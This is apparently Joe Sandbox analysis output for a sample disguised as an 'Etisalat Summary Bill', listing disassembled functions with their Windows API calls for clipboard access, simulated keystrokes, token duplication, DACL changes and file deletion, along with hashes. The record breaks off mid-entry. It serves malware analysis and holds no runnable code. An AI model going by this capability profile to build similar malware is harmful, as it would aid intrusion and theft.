SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009397AE
GetKeyState.USER32(00000010), ref: 009397B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009397E9
SendMessageW.USER32 ref: 00939810
SendMessageW.USER32(?,00001030,?,00937E95), ref: 00939918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0093992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00939941
SetCapture.USER32(?), ref: 0093994A
ClientToScreen.USER32(?,?), ref: 009399AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009399BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009399D6
ReleaseCapture.USER32 ref: 009399E1
GetCursorPos.USER32(?), ref: 00939A19
ScreenToClient.USER32(?,?), ref: 00939A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00939A80
SendMessageW.USER32 ref: 00939AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00939AEB
SendMessageW.USER32 ref: 00939B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00939B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00939B4A
GetCursorPos.USER32(?), ref: 00939B68
ScreenToClient.USER32(?,?), ref: 00939B75
GetParent.USER32(?), ref: 00939B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00939BFA
SendMessageW.USER32 ref: 00939C2B
ClientToScreen.USER32(?,?), ref: 00939C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00939CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00939CDE
SendMessageW.USER32 ref: 00939D01
ClientToScreen.USER32(?,?), ref: 00939D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00939D82

Part of subcall function 008B9944: GetWindowLongW.USER32(?,000000EB), ref: 008B9952

GetWindowLongW.USER32(?,000000F0), ref: 00939E05

Strings

@GUI_DRAGID, xrefs: 0093997D
F, xrefs: 00939D07

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: 52ef63b02572bb4ae349b1285c9e6ac6060ed16d1e8fd347c8aa19a0adf25606
Instruction ID: 4089d7433eab0eee1122f87dab27055c99b435a41a99eb489d2b9cd0a1d3d026
Opcode Fuzzy Hash: 52ef63b02572bb4ae349b1285c9e6ac6060ed16d1e8fd347c8aa19a0adf25606
Instruction Fuzzy Hash: 2D42CF75209201AFD724CF28CC45FAABBE9FF49318F100A19F699972A1D7B1E850DF52

Function 00934873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 009348F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00934908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00934927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0093494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0093495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0093497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 009349AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 009349D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00934A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00934A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00934A7E
IsMenu.USER32(?), ref: 00934A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00934AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00934B20
GetWindowLongW.USER32(?,000000F0), ref: 00934B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00934BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00934C82
wsprintfW.USER32 ref: 00934CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00934CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00934CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00934D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00934D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00934D5A

Strings

%d/%02d/%02d, xrefs: 00934CA8

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 7624d14eb8fb723268e825d65bde3adf6a7e4b1b4b9cc2f2d5b94b4e8bc9c7ab
Instruction ID: a732747a39bf44a1e830c29174fd85f281e66b969dc15971c6d20a58c1a9dbea
Opcode Fuzzy Hash: 7624d14eb8fb723268e825d65bde3adf6a7e4b1b4b9cc2f2d5b94b4e8bc9c7ab
Instruction Fuzzy Hash: 3312FC71600218ABEB248F28CC4AFAE7BF9EF45710F154529F516EA2E1DB78A941CF50

Function 008BF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 008BF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008FF474
IsIconic.USER32(00000000), ref: 008FF47D
ShowWindow.USER32(00000000,00000009), ref: 008FF48A
SetForegroundWindow.USER32(00000000), ref: 008FF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008FF4AA
GetCurrentThreadId.KERNEL32 ref: 008FF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008FF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 008FF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 008FF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 008FF4DE
SetForegroundWindow.USER32(00000000), ref: 008FF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 008FF4F6
keybd_event.USER32(00000012,00000000), ref: 008FF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 008FF50B
keybd_event.USER32(00000012,00000000), ref: 008FF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 008FF519
keybd_event.USER32(00000012,00000000), ref: 008FF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 008FF528
keybd_event.USER32(00000012,00000000), ref: 008FF52D
SetForegroundWindow.USER32(00000000), ref: 008FF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 008FF557

Strings

Shell_TrayWnd, xrefs: 008FF46F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: b3b2512468567dcf041dd546504066855ff31234e84b73b4a1daa91650b8a896
Instruction ID: a8b9536f95cf2e626c3b86cab02e790d88740b643704c7ac535b624d4dad7b4e
Opcode Fuzzy Hash: b3b2512468567dcf041dd546504066855ff31234e84b73b4a1daa91650b8a896
Instruction Fuzzy Hash: 26313CB1A5421CBAEB206BB55C4AFBF7E6CFB48B50F100025FB01F6191D6A19910BFA0

Function 00901201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 009016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0090170D
Part of subcall function 009016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0090173A
Part of subcall function 009016C3: GetLastError.KERNEL32 ref: 0090174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00901286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009012A8
CloseHandle.KERNEL32(?), ref: 009012B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009012D1
GetProcessWindowStation.USER32 ref: 009012EA
SetProcessWindowStation.USER32(00000000), ref: 009012F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00901310

Part of subcall function 009010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009011FC), ref: 009010D4
Part of subcall function 009010BF: CloseHandle.KERNEL32(?,?,009011FC), ref: 009010E9

Strings

winsta0, xrefs: 009012CC
default, xrefs: 0090130B
, xrefs: 0090125A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 237979dc33ebc78fce5cd0da2338030883d1043b242ed5fd353b7b0df2047cad
Instruction ID: c833a75dc1bb559d5130827ff24e968255d7519c8474d755bde3f72bdff8979b
Opcode Fuzzy Hash: 237979dc33ebc78fce5cd0da2338030883d1043b242ed5fd353b7b0df2047cad
Instruction Fuzzy Hash: 208177B1904209AFDF219FA8DC49BEE7BBDEF04704F144129FA11B62B0C7758A54DB25

Function 00900B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00901114
Part of subcall function 009010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00900B9B,?,?,?), ref: 00901120
Part of subcall function 009010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00900B9B,?,?,?), ref: 0090112F
Part of subcall function 009010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00900B9B,?,?,?), ref: 00901136
Part of subcall function 009010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0090114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00900BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00900C00
GetLengthSid.ADVAPI32(?), ref: 00900C17
GetAce.ADVAPI32(?,00000000,?), ref: 00900C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00900C6D
GetLengthSid.ADVAPI32(?), ref: 00900C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00900C8C
HeapAlloc.KERNEL32(00000000), ref: 00900C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00900CB4
CopySid.ADVAPI32(00000000), ref: 00900CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00900CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00900D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00900D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00900D45
HeapFree.KERNEL32(00000000), ref: 00900D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00900D55
HeapFree.KERNEL32(00000000), ref: 00900D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00900D65
HeapFree.KERNEL32(00000000), ref: 00900D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00900D78
HeapFree.KERNEL32(00000000), ref: 00900D7F

Part of subcall function 00901193: GetProcessHeap.KERNEL32(00000008,00900BB1,?,00000000,?,00900BB1,?), ref: 009011A1
Part of subcall function 00901193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00900BB1,?), ref: 009011A8
Part of subcall function 00901193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00900BB1,?), ref: 009011B7

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 9f68ef7c7d4cb6347fa18eb94c6991622658cb814711d451243c2889dcca99bf
Instruction ID: b8f26af6aa4dd79b785524469598e3868d6dc298bdd26dfa3579322ae24fef24
Opcode Fuzzy Hash: 9f68ef7c7d4cb6347fa18eb94c6991622658cb814711d451243c2889dcca99bf
Instruction Fuzzy Hash: CB7146B290421AAFDF109FE4DC49BAEBBBCBF44300F044615E914A72D1D771AA05EFA0

Function 0091EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0093CC08), ref: 0091EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0091EB37
GetClipboardData.USER32(0000000D), ref: 0091EB43
CloseClipboard.USER32 ref: 0091EB4F
GlobalLock.KERNEL32(00000000), ref: 0091EB87
CloseClipboard.USER32 ref: 0091EB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 0091EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0091EBC9
GetClipboardData.USER32(00000001), ref: 0091EBD1
GlobalLock.KERNEL32(00000000), ref: 0091EBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 0091EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0091EC38
GetClipboardData.USER32(0000000F), ref: 0091EC44
GlobalLock.KERNEL32(00000000), ref: 0091EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0091EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0091EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0091ECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 0091ECF3
CountClipboardFormats.USER32 ref: 0091ED14
CloseClipboard.USER32 ref: 0091ED59

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 0c1c05624f43907b1653c3963175cb836f4d69fa54937670cb6a9b43f8fc9d64
Instruction ID: 212cbd7c40c7c3ba852093697ef98e8ac6278fd9a1c35358116232b6817e491e
Opcode Fuzzy Hash: 0c1c05624f43907b1653c3963175cb836f4d69fa54937670cb6a9b43f8fc9d64
Instruction Fuzzy Hash: 3661D0752082069FD300EF24D889FAAB7E8FF85704F084519F856D72A1DB30D985DB62

Function 0091698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009169BE
FindClose.KERNEL32(00000000), ref: 00916A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00916A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00916A75

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00916AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00916ADF

Strings

%02d, xrefs: 00916C00, 00916C0A, 00916C5A, 00916CAA, 00916CFA, 00916D4A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00916B32
%4d, xrefs: 00916BB1
%03d, xrefs: 00916DA2
%4d%02d%02d%02d%02d%02d, xrefs: 00916B6A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: b5f1a93107539738825ed95b8feeef2bd39ca37da8d7a9d376272c6d63f0664a
Instruction ID: e655c1df47a91aa692438c3d6645761bda75c203c9de4612e4360bfade0c9013
Opcode Fuzzy Hash: b5f1a93107539738825ed95b8feeef2bd39ca37da8d7a9d376272c6d63f0664a
Instruction Fuzzy Hash: F8D14EB2908304AED710EBA8C981EABB7ECFF89704F44491DF585D6191EB74DA44CB63

Function 00919642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00919663
GetFileAttributesW.KERNEL32(?), ref: 009196A1
SetFileAttributesW.KERNEL32(?,?), ref: 009196BB
FindNextFileW.KERNEL32(00000000,?), ref: 009196D3
FindClose.KERNEL32(00000000), ref: 009196DE
FindFirstFileW.KERNEL32(*.*,?), ref: 009196FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0091974A
SetCurrentDirectoryW.KERNEL32(00966B7C), ref: 00919768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00919772
FindClose.KERNEL32(00000000), ref: 0091977F
FindClose.KERNEL32(00000000), ref: 0091978F

Strings

*.*, xrefs: 009196F5

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: fdfeaf828f262db0143d225e0ea176e3c0f1b4e9643e0cf5c3256319967b631c
Instruction ID: 48642796dc9e3f982bfb8e59a1f70e0c4bb10748f3d49d17023a5833a5b5c1d7
Opcode Fuzzy Hash: fdfeaf828f262db0143d225e0ea176e3c0f1b4e9643e0cf5c3256319967b631c
Instruction Fuzzy Hash: 8331CE7260461DAADF14AFB4DC18ADE77ACEF49320F104166F815E21E0EB30DA808F20

Function 0091979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 009197BE
FindNextFileW.KERNEL32(00000000,?), ref: 00919819
FindClose.KERNEL32(00000000), ref: 00919824
FindFirstFileW.KERNEL32(*.*,?), ref: 00919840
SetCurrentDirectoryW.KERNEL32(?), ref: 00919890
SetCurrentDirectoryW.KERNEL32(00966B7C), ref: 009198AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 009198B8
FindClose.KERNEL32(00000000), ref: 009198C5
FindClose.KERNEL32(00000000), ref: 009198D5

Part of subcall function 0090DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0090DB00

Strings

*.*, xrefs: 0091983B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: af9bf44b00e83f1dcfb82ab6168389bb31d96368f0c2e0beb1d33da866a44292
Instruction ID: 5ae87352b25b336373fe4061974205245c4f2cf16bdebf5206c26e2c3af68c00
Opcode Fuzzy Hash: af9bf44b00e83f1dcfb82ab6168389bb31d96368f0c2e0beb1d33da866a44292
Instruction Fuzzy Hash: D831C17260461DAEDF10AFB8EC58ADE77ACEF46324F1041A5E815E2190DB30DAC5CF20

Function 00918195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00918257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00918267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00918273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00918310
SetCurrentDirectoryW.KERNEL32(?), ref: 00918324
SetCurrentDirectoryW.KERNEL32(?), ref: 00918356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0091838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00918395

Strings

*.*, xrefs: 0091839B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 82c053c22192f69f95763266198f213d575bd07d2b5609ab0c3dfee4d7ccc5d4
Instruction ID: e23240eb5763900e51ec3bfc9da947bbcfe857e2c85690dc4a1627f5b2cbb1e3
Opcode Fuzzy Hash: 82c053c22192f69f95763266198f213d575bd07d2b5609ab0c3dfee4d7ccc5d4
Instruction Fuzzy Hash: 786157B26082099FDB10EF64C8409AFB3E8FF89310F04891EF999D7251DB31E945CB92

Function 0090D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008A3A97,?,?,008A2E7F,?,?,?,00000000), ref: 008A3AC2

Part of subcall function 0090E199: GetFileAttributesW.KERNEL32(?,0090CF95), ref: 0090E19A

FindFirstFileW.KERNEL32(?,?), ref: 0090D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0090D1DD
MoveFileW.KERNEL32(?,?), ref: 0090D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0090D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0090D237

Part of subcall function 0090D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0090D21C,?,?), ref: 0090D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0090D253
FindClose.KERNEL32(00000000), ref: 0090D264

Strings

\*.*, xrefs: 0090D0CD, 0090D0D6, 0090D0EB

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 1f6336703d32799676d4b8015b0f7490c82c376a40786bd00327cb9eccb6e197
Instruction ID: 0c1f14712ab154033d45ed328f5e6a00db2d024613926c1467a883590e462b4b
Opcode Fuzzy Hash: 1f6336703d32799676d4b8015b0f7490c82c376a40786bd00327cb9eccb6e197
Instruction Fuzzy Hash: 81618D3180611DAEDF05EBE8DA529EEB7B9FF55300F244065E412B3191EB34AF09DB61

Function 0091ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0091ED91
EmptyClipboard.USER32 ref: 0091ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0091EDAC
CloseClipboard.USER32 ref: 0091EEA3

Memory Dump Source

